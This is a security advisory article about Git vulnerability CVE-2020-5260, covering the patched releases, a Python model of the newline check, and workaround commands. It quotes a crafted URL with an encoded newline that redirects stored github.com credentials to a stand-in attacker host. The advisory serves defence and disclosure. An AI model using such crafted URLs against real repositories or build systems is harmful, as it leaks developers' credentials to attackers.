Git credential leakage vulnerability

Corrective releases of the distributed source control system Git have been published: 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4. They fix a vulnerability (CVE-2020-5260) in the "credential.helper" handler that causes credentials to be sent to the wrong host when a git client accesses a repository through a specially crafted URL containing a newline character. The vulnerability can be used to arrange for credentials belonging to another host to be sent to a server controlled by the attacker.

When a URL such as "https://evil.com?%0ahost=github.com/" is specified, the credential handler, while connecting to evil.com, will pass along the credentials stored for github.com. The problem occurs during operations such as "git clone", including the processing of submodule URLs (for example, "git submodule update" automatically processes the URLs given in the .gitmodules file from the repository). The vulnerability is most dangerous when a developer clones a repository without seeing the URL, for example when working with submodules, or in systems that perform actions automatically, for example in package build scripts.

To block the vulnerability, the new versions prohibit passing a newline character in any value transmitted through the credential exchange protocol. For distributions, the release of package updates can be tracked on the pages for Debian, Ubuntu, RHEL, SUSE/OpenSUSE, Fedora, Arch, FreeBSD.
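The newline check described above, as an added example (not code from Git or from the original article): a simplified Python model of the line-based key=value credential exchange, showing how the URL from the article makes a line-oriented helper see host=github.com, and how rejecting newlines in values stops it. The function names, the URL splitting and the "last key wins" helper behaviour are assumptions of this model.

```python
from urllib.parse import unquote

def split_url(url):
    """Simplified model (assumption): the host is everything between
    '://' and the next '/', percent-decoded before use."""
    protocol, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return {"protocol": protocol, "host": unquote(host), "path": unquote(path)}

def serialize_unchecked(fields):
    """Pre-fix behaviour: values written verbatim, one key=value per line."""
    return "".join(f"{k}={v}\n" for k, v in fields.items() if v)

def serialize_checked(fields):
    """Post-fix behaviour: refuse any value that contains a newline."""
    for key, value in fields.items():
        if "\n" in value:
            raise ValueError(f"credential value for {key!r} contains a newline")
    return serialize_unchecked(fields)

def helper_view(message):
    """What a line-oriented helper reads; a repeated key overrides the
    earlier one (assumption of this model)."""
    seen = {}
    for line in message.splitlines():
        if not line:
            break
        key, _, value = line.partition("=")
        seen[key] = value
    return seen

URL_FROM_ARTICLE = "https://evil.com?%0ahost=github.com/"

def demo():
    """Return (host the helper looks up without the check, whether the check rejects)."""
    fields = split_url(URL_FROM_ARTICLE)
    confused_host = helper_view(serialize_unchecked(fields))["host"]
    try:
        serialize_checked(fields)
        rejected = False
    except ValueError:
        rejected = True
    return confused_host, rejected

if __name__ == "__main__":
    print(demo())
```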

As a workaround, it is recommended not to use credential.helper when accessing public repositories and not to use "git clone" in "--recurse-submodules" mode with unverified repositories. To completely disable the credential.helper handler, which saves and retrieves passwords from a cache, a protected store or a file with passwords, you can use the following commands:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Source: opennet.ru
